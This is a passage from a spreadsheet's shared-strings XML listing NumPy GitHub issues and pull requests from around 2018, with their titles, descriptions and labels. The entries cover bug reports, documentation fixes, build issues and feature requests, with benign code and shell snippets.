    <t>BUG: np.ctypeslib.as_array(pointer, shape) fails</t>
  </si>
  <si>
    <t>['06 - Regression']</t>
  </si>
  <si>
    <t>this will make the new functions show up in the [generated index](http://www.numpy.org/devdocs/genindex.html#Q) and on the [search page](http://www.numpy.org/devdocs/search.html?q=quantile), where they are now lacking</t>
  </si>
  <si>
    <t>DOC: add quantile, nanquantile to toc</t>
  </si>
  <si>
    <t>['00 - Bug', '04 - Documentation']</t>
  </si>
  <si>
    <t>Even for 1-D Arrays, `PyArray_GETITEM` returns something different from `PySequence_GetItem`: `PyArray_GETITEM` returns standard Python types while `PySequence_GetItem` returns the corresponding Numpy scalar types. This should be documented to avoid confusion.</t>
  </si>
  <si>
    <t>Document PyArray_GETITEM / PySequence_GetItem discrepancy</t>
  </si>
  <si>
    <t>['04 - Documentation', 'good first issue']</t>
  </si>
  <si>
    <t>If numpy+mkl is faster, how much faster is it than numpy?_x000D_
I can't feel the difference in their speed._x000D_
Because I need to install Scipy, I must install numpy+mkl version. I found that numpy+mkl's installation package is much larger than numpy's._x000D_
_x000D_
Note: I am using Windows 10 on Intel's CPU.</t>
  </si>
  <si>
    <t>Is numpy+mkl faster than numpy?</t>
  </si>
  <si>
    <t>['57 - Close?']</t>
  </si>
  <si>
    <t xml:space="preserve">On Pypy, dictionary keys do not necessarily preserve object identity._x000D_
_x000D_
This however was assumed by the NPY_TITLE_KEY macro, which relies on_x000D_
descriptor.c:568 using the same 'title' object both as a dictionary key_x000D_
as an entry in the tuple inserted._x000D_
_x000D_
Since the items in the field dict are unique, value identity is however_x000D_
sufficient for the NPY_TITLE_KEY macro. On PyPy, fix the macro by_x000D_
comparing values instead._x000D_
_x000D_
cf. https://bitbucket.org/pypy/pypy/issues/2789_x000D_
_x000D_
cc: @mattip </t>
  </si>
  <si>
    <t>BUG: core: fix NPY_TITLE_KEY macro on pypy</t>
  </si>
  <si>
    <t>['00 - Bug', '24 - PyPy', 'component: numpy.core']</t>
  </si>
  <si>
    <t>BUG: Fix encoding regression in ma/bench.py (Issue #10868)</t>
  </si>
  <si>
    <t>['00 - Bug', '06 - Regression']</t>
  </si>
  <si>
    <t>The test program in `openblas_lapack_info.check_embedded_lapack` attempts to avoid an "implicit declaration" warning. However, it fails to achieve this because the declaration is missing an underscore. This prevents NumPy from building against OpenBLAS if `CFLAGS` contains `-Werror=implicit-function-declaration`.</t>
  </si>
  <si>
    <t>BUG: Add missing underscore to prototype in check_embedded_lapack</t>
  </si>
  <si>
    <t>['00 - Bug', 'component: numpy.distutils']</t>
  </si>
  <si>
    <t>We never tested that `a.flags['WRITEBACKIFCOPY']` works, and there was an off-by-one error in the switch to handle this `getitem` case._x000D_
_x000D_
I added a failing test then fixed it.</t>
  </si>
  <si>
    <t>BUG: test, fix for missing flags['WRITEBACKIFCOPY'] key</t>
  </si>
  <si>
    <t>['00 - Bug', '24 - PyPy']</t>
  </si>
  <si>
    <t xml:space="preserve">- Used https://github.com/client9/misspell to identify and fix typos throughout the repo_x000D_
- Thanks for all the hard work!_x000D_
</t>
  </si>
  <si>
    <t>MAINT, DOC: Fix typos</t>
  </si>
  <si>
    <t>This is a WIP of the release notes for a 1.14.3 release._x000D_
_x000D_
@charris, for "checking if there are other things that should be included", what is your heuristic for choosing? Small bugfixes, but not so small as doc typos?_x000D_
_x000D_
Here's a preliminary list of backport candidates:_x000D_
https://github.com/numpy/numpy/pull/10822_x000D_
https://github.com/numpy/numpy/pull/10916_x000D_
https://github.com/numpy/numpy/pull/10875_x000D_
https://github.com/numpy/numpy/pull/10869_x000D_
https://github.com/numpy/numpy/issues/10794</t>
  </si>
  <si>
    <t>DOC: create 1.14.3 release note</t>
  </si>
  <si>
    <t>Lately,  I have been experimenting **np.argsort** (version 1.14.2, python 3.5.5) and I have realized something weird._x000D_
_x000D_
If you run the following code, you will get the result:_x000D_
_x000D_
```py_x000D_
In [0]: np.argsort([3]*16)_x000D_
Out[0]:_x000D_
array([ 0,  1,  2,  3,  4,  5,  6,  7,  8,  9, 10, 11, 12, 13, 14, 15], dtype=int64)_x000D_
```_x000D_
_x000D_
But if you make just a little change:_x000D_
_x000D_
```py_x000D_
In [1]: np.argsort([3]*17)_x000D_
Out[1]:_x000D_
array([ 0, 14, 13, 12, 11, 10,  9, 15,  8,  6,  5,  4,  3,  2,  1,  7, 16], dtype=int64)_x000D_
```_x000D_
_x000D_
I know the default method for *numpy argsort* is *quicksort*, which is an unstable sorting algorithm. But, **there is an reasonably explanation about the differents behavior above? Is this related to quicksort's choice of pivot? If so, why?**</t>
  </si>
  <si>
    <t>Numpy's argsort instability</t>
  </si>
  <si>
    <t>As [GCC 8 is coming](https://gcc.gnu.org/gcc-8/changes.html) numpy should verify whether is it supports the gcc 8 libs.</t>
  </si>
  <si>
    <t>Is numpy GCC 8 ready</t>
  </si>
  <si>
    <t>['component: build']</t>
  </si>
  <si>
    <t>PR #9998 added a `close` method to `nditer` that resolved writeback semantics but did not actually disallow access to the iterator operands</t>
  </si>
  <si>
    <t>BUG: it.close() disallows access to iterator, fixes #10950</t>
  </si>
  <si>
    <t>After merging PR #9998, careful review picked up some mistakes in documentation</t>
  </si>
  <si>
    <t>DOC: cleanup documentation, continuation of nditer PR #9998</t>
  </si>
  <si>
    <t>Fixes #10934 _x000D_
_x000D_
Backport of #10946</t>
  </si>
  <si>
    <t>BUG: 'style' arg to array2string broken in legacy mode (1.14 Backport)</t>
  </si>
  <si>
    <t>Fixes #10934 _x000D_
_x000D_
I will create a backport soon, and then would like to try a 1.14.3 release if @charris thinks it is not too late.</t>
  </si>
  <si>
    <t>BUG: 'style' arg to array2string broken in legacy mode</t>
  </si>
  <si>
    <t>#10944</t>
  </si>
  <si>
    <t>MAINT: Remove references to the 2008 documentation marathon</t>
  </si>
  <si>
    <t>The `doc/source/reference/index.rst` file acknowledgement suggests joining the no longer active documentation marathon.</t>
  </si>
  <si>
    <t>Documentation marathon is kaput.</t>
  </si>
  <si>
    <t>['03 - Maintenance', 'component: Documentation', 'good first issue']</t>
  </si>
  <si>
    <t>#10643</t>
  </si>
  <si>
    <t>ENH: Add a search box to the sidebar in the docs</t>
  </si>
  <si>
    <t>['01 - Enhancement', '04 - Documentation', 'component: Documentation']</t>
  </si>
  <si>
    <t xml:space="preserve">The URL referenced is: https://docs.scipy.org/doc/numpy-dev/user/quickstart.html_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Link from numpy.org to tutorial is broken (404)</t>
  </si>
  <si>
    <t>['component: Documentation']</t>
  </si>
  <si>
    <t>Previously, both AVX support checking and macOS version checking were_x000D_
performed via a system(3) call and failed if the system utilities used_x000D_
(sysctl(8) and sw_vers(1)) were present in $PATH. This PR should remove such_x000D_
dependency using sysctlbyname(3). See #7801.</t>
  </si>
  <si>
    <t>BUG: Use system call to check AVX support and macOS version</t>
  </si>
  <si>
    <t>['00 - Bug', 'component: build']</t>
  </si>
  <si>
    <t>Still no behavior changes._x000D_
_x000D_
Relates to #8720</t>
  </si>
  <si>
    <t>MAINT: One step closer to vectorizing lstsq</t>
  </si>
  <si>
    <t>['03 - Maintenance', 'component: numpy.linalg']</t>
  </si>
  <si>
    <t>DOC: Fix NumpyVersion example (closes gh-10935)</t>
  </si>
  <si>
    <t>Code to trigger the error:_x000D_
```python_x000D_
&gt;&gt;&gt; import numpy as np_x000D_
&gt;&gt;&gt; np.__version___x000D_
'1.14.2'_x000D_
&gt;&gt;&gt; np.array2string(np.array(1.0))_x000D_
'1.'_x000D_
&gt;&gt;&gt; np.set_printoptions(legacy='1.13')_x000D_
&gt;&gt;&gt; np.array2string(np.array(1.0))_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
  File "[...]/numpy/core/arrayprint.py", line 616, in array2string_x000D_
    return style(a.item())_x000D_
TypeError: object() takes no parameters_x000D_
```_x000D_
Same error with 1.14.1 and 1.14.0._x000D_
_x000D_
Since `style` is just an alias for `np._NoValue` the code effectively calls (or instantiates, depending on the code version) `_NoValue(1.0)`, which is not valid._x000D_
I saw that there was a recent change in `_globals.py` that makes `_NoValue` an instance instead of a class, but it has no `__call__`, so unless I'm missing something, it won't work either.</t>
  </si>
  <si>
    <t>Legacy 1.13 printing broken for 0d arrays</t>
  </si>
  <si>
    <t>Hey there 👋 !_x000D_
_x000D_
I'm using numpy `1.14.2` with python `2.7.10`._x000D_
_x000D_
I'm trying to subclass `numpy.ndarray`, and it seems like, unlike most other operators/functions, `numpy.select` and `numpy.where` don't preserve the sublass of an array. Here is an exemple:_x000D_
_x000D_
```py_x000D_
import numpy as np_x000D_
_x000D_
# I create a sublass of np.ndarray containing a custom attribute_x000D_
class CustomArray(np.ndarray):_x000D_
    def __new__(cls, matrix, custom_attribute):_x000D_
        obj = np.asarray(matrix).view(cls)_x000D_
        obj.custom_attribute = custom_attribute_x000D_
        return obj_x000D_
_x000D_
    def __array_finalize__(self, obj):_x000D_
        if obj is None:_x000D_
            return_x000D_
        self.custom_attribute = getattr(obj, 'custom_attribute', None)_x000D_
_x000D_
x = CustomArray(np.asarray([1,2,3]), 'some_value')  # a custom array_x000D_
y = np.asarray([4,5,6])  # a regular array_x000D_
_x000D_
# Sublass is preserved by most operations_x000D_
assert type(x + y) == CustomArray_x000D_
assert type(x * y) == CustomArray_x000D_
assert type(np.maximum(x, y)) == CustomArray_x000D_
assert type(np.logical_not((x &gt; 1) * (y &lt;= 5))) == CustomArray_x000D_
_x000D_
# But not by where and select, even if the only arrays involved are all CustomArrays_x000D_
_x000D_
where_result = np.where(x &lt;= 1, x + 1, x)_x000D_
_x000D_
select_result = np.select(_x000D_
  [[x &lt;= 1], [x &lt;= 2]],_x000D_
  [[x + 1], [x + 2]],_x000D_
  x_x000D_
  )_x000D_
_x000D_
# The 2 following assertions fail_x000D_
assert type(where_result) == CustomArray_x000D_
assert type(select_result) == CustomArray_x000D_
```_x000D_
_x000D_
Is that an intended behavior ? _x000D_
_x000D_
Thanks a lot !</t>
  </si>
  <si>
    <t>Functions `select` and `where` don't preserve subclasses</t>
  </si>
  <si>
    <t>['00 - Bug', '50 - Duplicate']</t>
  </si>
  <si>
    <t>```python_x000D_
import numpy as np_x000D_
_x000D_
t = np.dtype('i1, i4, i1', align=True)_x000D_
d = np.zeros(1, t)_x000D_
_x000D_
np.save("test.npy", d)_x000D_
data = np.load("test.npy")_x000D_
_x000D_
Traceback (most recent call last):_x000D_
  File "D:\Projects\numpy_bug.py", line 8, in &lt;module&gt;_x000D_
    data = np.load("test.npy")_x000D_
  File "D:\Projects\vendors\numpy\lib\npyio.py", line 314, in load_x000D_
    return format.read_array(fid)_x000D_
  File "D:\Projects\vendors\numpy\lib\format.py", line 440, in read_array_x000D_
    shape, fortran_order, dtype = read_array_header_1_0(fp)_x000D_
  File "D:\Projects\vendors\numpy\lib\format.py", line 358, in read_array_header_1_0_x000D_
    dtype = numpy.dtype(d['descr'])_x000D_
ValueError: two fields with the same name_x000D_
```_x000D_
Fixes gh-2215</t>
  </si>
  <si>
    <t>BUG: Fix `np.load` for aligned dtypes.</t>
  </si>
  <si>
    <t xml:space="preserve">These clutter the autocomplete, and are names that look very plausible as numpy features._x000D_
_x000D_
Also do this to every single file in numpy, for consistency._x000D_
_x000D_
---_x000D_
_x000D_
I haven't found any precedent for doing this elsewhere, but it removes this confusing behavior for beginners exploring via autocomplete in ipython_x000D_
![image](https://user-images.githubusercontent.com/425260/38919185-bf1e76bc-42a4-11e8-8ef8-3f03ae254d96.png)_x000D_
</t>
  </si>
  <si>
    <t>MAINT: Remove the misleading `np.division` and `np.print_function` inherited from __future__</t>
  </si>
  <si>
    <t>['03 - Maintenance']</t>
  </si>
  <si>
    <t>DOC: Fix typos in 1.15.0 changelog</t>
  </si>
  <si>
    <t>The `percentile` documentation had some misformatting that caused a failure of the  interpolation plot. I fixed that, then fixed a few more formatting errors along the way, mainly the way lists had no blank line before them.</t>
  </si>
  <si>
    <t>DOC: clear up warnings, fix matplotlib plot</t>
  </si>
  <si>
    <t>When building `numpy` from source and running the command `strip`, the resulting folder is 66% lighter than when using the manylinux wheel (via `pip`)._x000D_
_x000D_
&gt; [...] the strip program removes inessential information from executable binary programs and object files, thus potentially resulting in better performance and sometimes significantly less disk space usage_x000D_
https://en.wikipedia.org/wiki/Strip_(Unix)_x000D_
_x000D_
This is probably harmless on most systems, yet it is quite important in size-constrained systems (such as [AWS Lambda](https://docs.aws.amazon.com/lambda/latest/dg/limits.html))._x000D_
_x000D_
Some developers have resorted to distributing their own stripped binaries (e.g. [lambda packages](https://github.com/Miserlou/lambda-packages/) for the serverless framework [zappa](https://github.com/Miserlou/Zappa)), but it seems like a makeshift solution._x000D_
_x000D_
I think the problem should be solved upstream, as each library should be responsible for packaging their own optimized binaries._x000D_
_x000D_
# System specifications_x000D_
_x000D_
Every command below has been executed using the `amazonlinux` docker image._x000D_
https://hub.docker.com/_/amazonlinux/_x000D_
_x000D_
Numpy version: `1.14.2`_x000D_
Python version: `3.6.2`_x000D_
_x000D_
# How to replicate _x000D_
_x000D_
## Prepare docker image_x000D_
_x000D_
```_x000D_
docker run -it amazonlinux bash_x000D_
yum update -y_x000D_
yum install -y findutils binutils python36-devel gcc_x000D_
```_x000D_
_x000D_
## Install wheel &amp; measure package size_x000D_
_x000D_
```bash_x000D_
python3 -m pip install -t wheel numpy==1.14.2_x000D_
du -sh wheel_x000D_
```_x000D_
--&gt; **57 MB**_x000D_
_x000D_
Try [strip](https://en.wikipedia.org/wiki/Strip_(Unix)):_x000D_
_x000D_
```bash_x000D_
find wheel/ -name "*.so"|xargs strip_x000D_
du -sh wheel_x000D_
```_x000D_
--&gt; 56 MB_x000D_
_x000D_
No real progress here. The binary wheel seems already stripped._x000D_
_x000D_
## Build from source &amp; measure package size_x000D_
_x000D_
```bash_x000D_
python3 -m pip install -t build --no-binary numpy numpy==1.14.2_x000D_
du -sh build_x000D_
```_x000D_
--&gt; 42 MB_x000D_
_x000D_
Try [strip](https://en.wikipedia.org/wiki/Strip_(Unix)):_x000D_
_x000D_
```bash_x000D_
find build/ -name "*.so"|xargs strip_x000D_
du -sh build_x000D_
```_x000D_
--&gt; **19 MB**</t>
  </si>
  <si>
    <t>Manylinux wheel size could be reduced by 66%</t>
  </si>
  <si>
    <t xml:space="preserve">Fixes gh-10450._x000D_
_x000D_
This is the alternative to #10470 and #10488._x000D_
_x000D_
I've made these changes on top of one another, so the commit diffs are largely meaningless (will squash before merging)_x000D_
_x000D_
The effect here is that all of these will pass `args=(in1, in2)` to `__array_prepare__` and `__array_wrap__`:_x000D_
_x000D_
* `ufunc(in1, in2)` - unchanged_x000D_
* `ufunc(in1, in2, None)` - previously:_x000D_
   * prepare: `(in1, in2, None)`_x000D_
   * wrap: `(in1, in2, None)`_x000D_
* `ufunc(in1, in2, out=None)` - previously:_x000D_
   * prepare: `(in1, in2, None)`_x000D_
* `ufunc(in1, in2, out=(None,))` - previously_x000D_
   * prepare: `(in1, in2, (None,))`_x000D_
_x000D_
Whereas these will pass `args=(in1, in2, out)`;_x000D_
_x000D_
* `ufunc(in1, in2, out)` - unchanged_x000D_
* `ufunc(in1, in2, out=out)` - previously_x000D_
   * wrap: `(in1, in2)`_x000D_
* `ufunc(in1, in2, out=(out,))` - previously_x000D_
   * prepare: not called on out at all!_x000D_
   * wrap: `(in1, in2)`_x000D_
</t>
  </si>
  <si>
    <t>BUG: Pass non-None outputs to `__array_prepare__` and `__array_wrap__`</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;img width="847" alt="screen shot 2018-04-16 at 11 01 46 pm" src="https://user-images.githubusercontent.com/31265128/38846412-2fa2cf4a-41ca-11e8-91b7-0157b1a44d1e.png"&gt;_x000D_
</t>
  </si>
  <si>
    <t>np.float32 dtype wrong result in np.linalg.norm and np.dot, attributed to MKL bug</t>
  </si>
  <si>
    <t>['00 - Bug', '50 - Duplicate', 'component: numpy.linalg']</t>
  </si>
  <si>
    <t>~This s a first look at how the implementation of "NEP 0015" will look.~ Only one test pattern needed adjustment._x000D_
_x000D_
There is now `multiarray.py` and `umath.py`, and a c-extension `_multiarray` comprising the code from the two previous c-extension modules._x000D_
_x000D_
The next step is to clean up the module initialization to avoid  `set_numeric_ops`_x000D_
_x000D_
Edit: s/test/test pattern/_x000D_
_x000D_
Edit: strike out first sentence</t>
  </si>
  <si>
    <t>ENH: implement nep 0015: merge multiarray and umath</t>
  </si>
  <si>
    <t>A cleaner fix might be possible if I were to i.e., move the C algorithm into Cython; leaving the `while` loop in C seems to require a bit of low-level intervention to enable Keyboard Interrupt handling &amp; using the Python C API as suggested in the referenced issue results in a segfault after catching ctrl+c._x000D_
_x000D_
I'm also not a big fan of the unit test structure with Python tempfile script (!) (not even sure that will work on CI)--perhaps there are better suggestions--probing `SIGINT` handling on pathological input seems like a tricky thing to test._x000D_
_x000D_
* Fixes Issue #9829 by allowing a keyboard interruption_x000D_
to break out of zipf() computations that run for very_x000D_
long times because of pathological inputs_x000D_
_x000D_
* Added a unit test that verifies handling of SIGINT_x000D_
by zipf()</t>
  </si>
  <si>
    <t>BUG: fixes np.random.zipf() hanging on pathological input</t>
  </si>
  <si>
    <t>['00 - Bug', 'component: numpy.random']</t>
  </si>
  <si>
    <t xml:space="preserve">Fix #10899 </t>
  </si>
  <si>
    <t>BUG: Fix casting between npy_half and float in einsum</t>
  </si>
  <si>
    <t>Creating a structured array from already existing data (to enable named-field access) seems to be more difficult than I expect._x000D_
_x000D_
What I expected was I could pass my existing 2D ndarray to numpy.array with a new dtype:_x000D_
_x000D_
```python_x000D_
a = np.arange(4).reshape(2,2)_x000D_
b = np.array(a, dtype=[('a', float), ('b', int)])_x000D_
```_x000D_
_x000D_
_x000D_
This does give the expected dtype (`[('a', '&lt;f8'), ('b', '&lt;i4')]`), but the resulting array has repeated entries and more dimensions:_x000D_
```_x000D_
[[(0., 0) (1., 1)]_x000D_
 [(2., 2) (3., 3)]]_x000D_
```_x000D_
and the field access `b['a']` gives:_x000D_
```_x000D_
[[0. 1.]_x000D_
 [2. 3.]]_x000D_
```_x000D_
_x000D_
Using `np.array`, `np.asarray`, or `ndarray.astype` all do this._x000D_
_x000D_
Using direct assignment of `ndarray.dtype` or using `ndarray.view` (with `dtype=[('a', float), ('b', float)]`) gives something a little different (still the wrong  number of dimensions):_x000D_
```_x000D_
[[(0, 1)]_x000D_
 [(2, 3)]]_x000D_
```_x000D_
and the field access `b['a']` gives:_x000D_
```_x000D_
[[0]_x000D_
 [2]]_x000D_
```_x000D_
_x000D_
_x000D_
What does give the expected result:_x000D_
_x000D_
- If `numpy.array` is passed a list of tuples (`[(0,1), (2,3)]`), then it behaves as expected (not list of lists, list of 1D ndarrays, 2D ndarray, etc.).  But copying large arrays into tuples first not great._x000D_
- Using `numpy.rec.fromarrays`, passing the **transpose** of `a`.  A record array isn't necessary, but this is an easy solution._x000D_
_x000D_
So there is a currently available solution, but it still seems that some of the seemingly straight-forward ways of doing this don't give the expected result.</t>
  </si>
  <si>
    <t>ENH(?): Improved structured array creation support</t>
  </si>
  <si>
    <t>['15 - Discussion', '57 - Close?', 'component: numpy.dtype']</t>
  </si>
  <si>
    <t>fixes #10881 by moving `from __future__ ...` import after docstring</t>
  </si>
  <si>
    <t>TST: reactivate module docstring tests, fix float formatting</t>
  </si>
  <si>
    <t xml:space="preserve">according to [this](https://math.stackexchange.com/questions/796709/kronecker-product-and-outer-product-confusion) and [this ](https://math.stackexchange.com/questions/2737675/whats-the-outer-product-of-two-row-vectors)the outer product of a b and outer product a.T b.T should not be the same_x000D_
_x000D_
but when I do this _x000D_
import numpy as np_x000D_
a = np.array([[1], [2], [3]])_x000D_
b = np.array([[4], [5], [6]])_x000D_
col_result=np.outer(a, b)_x000D_
row_result=np.outer(a.T, b.T)_x000D_
print(col_result)_x000D_
print(row_result)_x000D_
_x000D_
the result are equal_x000D_
</t>
  </si>
  <si>
    <t>outer product calculation error</t>
  </si>
  <si>
    <t xml:space="preserve">Fixes #10870 _x000D_
_x000D_
For consideration for numpy 1.14.3 (if we release it). This should fix up that little back-compat break in `np.fromrecords`, so that users still only get a deprecation warning for 1.14. </t>
  </si>
  <si>
    <t>BUG: for 1.14 back-compat, accept list-of-lists in fromrecords</t>
  </si>
  <si>
    <t>['07 - Deprecation']</t>
  </si>
  <si>
    <t>Fixes #10902 : Changed `See Also` doc-string section of `randn`  in `random/mtrand.pyx`</t>
  </si>
  <si>
    <t>DOC:  Fix link in `See Also` section of `randn` docstring.</t>
  </si>
  <si>
    <t>['04 - Documentation', 'component: numpy.random']</t>
  </si>
  <si>
    <t>In the documentation [page ](https://docs.scipy.org/doc/numpy/reference/generated/numpy.random.randn.html) of `numpy.random.randn` , the **See Also** section mentions `random.standard_normal` , but there there is no link to the documnetaion page of `random.standard_normal`.  This should link to [https://docs.scipy.org/doc/numpy/reference/generated/numpy.random.standard_normal.html](https://docs.scipy.org/doc/numpy/reference/generated/numpy.random.standard_normal.html)</t>
  </si>
  <si>
    <t>Documentation : No link to `standard_normal` in 'See Also' section of 'numpy.random.randn'</t>
  </si>
  <si>
    <t>['04 - Documentation', 'component: numpy.random', 'good first issue']</t>
  </si>
  <si>
    <t>Changed the `See Also` section in the `random_integers` function in `numpy/random/mtrand.pyx`_x000D_
_x000D_
from _x000D_
```_x000D_
        See Also_x000D_
        --------_x000D_
        random.randint : Similar to `random_integers`, only for the half-open_x000D_
            interval [`low`, `high`), and 0 is the lowest value if `high` is_x000D_
            omitted._x000D_
```_x000D_
_x000D_
to_x000D_
_x000D_
```_x000D_
        See Also_x000D_
        --------_x000D_
        np.random.randint : Similar to `random_integers`, only for the half-open_x000D_
            interval [`low`, `high`), and 0 is the lowest value if `high` is_x000D_
            omitted._x000D_
```</t>
  </si>
  <si>
    <t>DOC, BUG : Bad link to `np.random.randint`</t>
  </si>
  <si>
    <t>This started with the first two commits which make the devdocs more prominent and add the howto_build and howto_docuement to the public document tree._x000D_
_x000D_
I then noticed all the warnings produced during documentation generation. It seems that the plots in `random` require scipy.special to produce the theoretical distribution alongside the sampled distribution._x000D_
There are still many more warnings, see the [circleci build](https://circleci.com/gh/numpy/numpy/958?utm_campaign=vcs-integration-link&amp;utm_medium=referral&amp;utm_source=github-build-link)_x000D_
_x000D_
Should I split this into separate smaller pull requests? I still would like to silence more of the warnings, so this is still a WIP</t>
  </si>
  <si>
    <t>DOC: rework documents and silence warnings during sphinx build</t>
  </si>
  <si>
    <t>To reproduce:_x000D_
```_x000D_
&gt;&gt;&gt; np.einsum('i,ji-&gt;', np.ones(2, dtype=np.float16), np.eye(2, dtype=np.float16))_x000D_
32770.0_x000D_
```_x000D_
_x000D_
Why:_x000D_
`*(@type@ *)dataptr[2] += @to@(accum);` in https://github.com/numpy/numpy/blob/3ec8875/numpy/core/src/multiarray/einsum.c.src#L594 is preprocessed to `*(npy_half *)dataptr[2] += npy_float_to_half(accum);`.  The example above works fine if the line is replaced with_x000D_
```_x000D_
*(@type@ *)dataptr[2] = @to@(@from@(*(@type@ *)dataptr[2]) + accum);_x000D_
```</t>
  </si>
  <si>
    <t>BUG: result of numpy.einsum is sometimes wrong with float16</t>
  </si>
  <si>
    <t>['00 - Bug', 'component: numpy.einsum']</t>
  </si>
  <si>
    <t>Resolves #10897_x000D_
_x000D_
This is a simple way that initially enables things like exposing autodiff scalars with heap-allocated derivatives. See the original issue for more info._x000D_
_x000D_
This Travis build job shows the code working with this patch (well, an older version of it):_x000D_
https://travis-ci.org/RobotLocomotion/pybind11/jobs/364928883#L1630-L1635_x000D_
_x000D_
\cc @njsmith - Since this is a relatively small change, figured I'd see if this appropriate to upstream at this point.</t>
  </si>
  <si>
    <t>ENH: Have dtype transfer for equivalent user dtypes prefer user-defined `copyswapn`</t>
  </si>
  <si>
    <t>The search path is prefixed by -I/usr/local/include and -I/usr/include. Here is a full build command used by numpy, for example:_x000D_
_x000D_
```_x000D_
/home/yfeng1/anaconda3/install/bin/x86_64-conda_cos6-linux-gnu-cc -DNDEBUG -fwrapv -O2 -Wall -Wstrict-prototypes -march=nocona -mtune=haswell -ftree-vectorize -fPIC -fstack-protector-strong -fno-plt -O2 -pipe -DNDEBUG -D_FORTIFY_SOURCE=2 -O2 -fPIC -DNPY_INTERNAL_BUILD=1 -DHAVE_NPY_CONFIG_H=1 -D_FILE_OFFSET_BITS=64 -D_LARGEFILE_SOURCE=1 -D_LARGEFILE64_SOURCE=1 -DSCIPY_MKL_H -DHAVE_CBLAS -I/usr/local/include -I/usr/include -I/usr/include/suitesparse -I/home/yfeng1/anaconda3/install/include -Ibuild/src.linux-x86_64-3.6/numpy/core/src/private -Inumpy/core/include -Ibuild/src.linux-x86_64-3.6/numpy/core/include/numpy -Inumpy/core/src/private -Inumpy/core/src -Inumpy/core -Inumpy/core/src/npymath -Inumpy/core/src/multiarray -Inumpy/core/src/umath -Inumpy/core/src/npysort -I/home/yfeng1/anaconda3/install/include/python3.6m -Ibuild/src.linux-x86_64-3.6/numpy/core/src/private -Ibuild/src.linux-x86_64-3.6/numpy/core/src/npymath -Ibuild/src.linux-x86_64-3.6/numpy/core/src/private -Ibuild/src.linux-x86_64-3.6/numpy/core/src/npymath -Ibuild/src.linux-x86_64-3.6/numpy/core/src/private -Ibuild/src.linux-x86_64-3.6/numpy/core/src/npymath -c numpy/core/src/multiarray/calculation.c_x000D_
```_x000D_
_x000D_
If I add -MM, it shows_x000D_
```_x000D_
...._x000D_
 /usr/include/numpy/ndarraytypes.h /usr/include/numpy/npy_common.h \_x000D_
 /usr/include/numpy/numpyconfig.h /usr/include/numpy/_numpyconfig.h \_x000D_
 numpy/core/src/private/npy_config.h \_x000D_
 build/src.linux-x86_64-3.6/numpy/core/include/numpy/config.h \_x000D_
 /usr/include/numpy/numpyconfig.h /usr/include/numpy/npy_cpu.h \_x000D_
 /usr/include/numpy/npy_os.h /usr/include/numpy/npy_endian.h \_x000D_
 /usr/include/numpy/npy_cpu.h /usr/include/numpy/utils.h \_x000D_
 /usr/include/numpy/_neighborhood_iterator_imp.h \_x000D_
 /usr/include/numpy/__multiarray_api.h /usr/include/numpy/npy_interrupt.h \_x000D_
 /usr/include/setjmp.h /usr/include/bits/setjmp.h \_x000D_
 /usr/include/bits/setjmp2.h /usr/include/signal.h \_x000D_
 /usr/include/bits/signum.h /usr/include/bits/siginfo.h \_x000D_
 /usr/include/bits/sigaction.h /usr/include/bits/sigcontext.h \_x000D_
 /usr/include/bits/sigstack.h /usr/include/sys/ucontext.h \_x000D_
 /usr/include/bits/sigthread.h numpy/core/src/private/npy_pycompat.h \_x000D_
 /usr/include/numpy/npy_3kcompat.h /usr/include/numpy/npy_common.h \_x000D_
 /usr/include/numpy/ndarrayobject.h numpy/core/src/multiarray/common.h \_x000D_
 /usr/include/numpy/ndarraytypes.h numpy/core/src/multiarray/ucsnarrow.h \_x000D_
 numpy/core/src/multiarray/number.h \_x000D_
 numpy/core/src/multiarray/calculation.h \_x000D_
 numpy/core/src/multiarray/array_assign.h_x000D_
```_x000D_
_x000D_
So the incompatible, older installation get into the way of runtests.py, causing a build failure (new macros are not defined). I suspect flipping the ordering of the search path will solve this problem.</t>
  </si>
  <si>
    <t>runtests fails to build numpy on systems where older incompatible numpy is installed.</t>
  </si>
  <si>
    <t>['16 - Development', 'component: build']</t>
  </si>
  <si>
    <t xml:space="preserve">When constructing arrays it is useful to set the dtype. For some reason we can do it with some `np.random` methods such as random integers but not with random normal values. Could we have a consitent version across all methods that generate new np.arrays?_x000D_
_x000D_
```python_x000D_
&gt;&gt;&gt; np.random.randint(10,dtype="Int16")_x000D_
9_x000D_
&gt;&gt;&gt; np.random.normal(10,dtype="Float32")_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
  File "mtrand.pyx", line 1547, in mtrand.RandomState.normal (numpy/random/mtrand/mtrand.c:20493)_x000D_
TypeError: normal() got an unexpected keyword argument 'dtype'_x000D_
```_x000D_
_x000D_
This would be nice in order to avoid   `np.array( somearray, dtype=sometype )` every time we create a new random array. _x000D_
_x000D_
For example _x000D_
```python_x000D_
np.array( np.random.normal(10), dtype="Float32")_x000D_
```_x000D_
could be simply written as_x000D_
```python_x000D_
 np.random.normal(10, dtype="Float32")_x000D_
```_x000D_
</t>
  </si>
  <si>
    <t>Feature request: numpy.random.normal with `dtype`</t>
  </si>
  <si>
    <t>['01 - Enhancement', 'component: numpy.random']</t>
  </si>
  <si>
    <t>This also means we can now test that our test is actually able to detect the type of failure we expect_x000D_
_x000D_
Trying to give myself some tools to debug the failure at https://github.com/numpy/numpy/pull/10882/files#r180813166</t>
  </si>
  <si>
    <t>TST: Extract a helper function to test for reference cycles</t>
  </si>
  <si>
    <t>['05 - Testing', '56 - Needs Release Note.', 'component: numpy.testing']</t>
  </si>
  <si>
    <t>This saves a larger-than-needed output array from being allocated</t>
  </si>
  <si>
    <t>MAINT: lstsq: compute residuals inside the ufunc</t>
  </si>
  <si>
    <t>Similar to the case for `svd` (#9516), `lstsq` currently enforces double precision. Now that we expose the single-precision BLAS functions as `gufuncs` (#9980), there is no longer a need for this limitation. This is a reminder that we should allow them to be used, most easily perhaps through a new `dtype` argument that defaults to using double precision (for discussion, see #9980).</t>
  </si>
  <si>
    <t>Don't enforce double precision in lstsq</t>
  </si>
  <si>
    <t>['23 - Wish List', '50 - Duplicate', 'component: numpy.linalg']</t>
  </si>
  <si>
    <t xml:space="preserve">Under  numpy.random.random_integers(low, high=None, size=None), it says:_x000D_
_x000D_
&gt; See also random.randint_x000D_
_x000D_
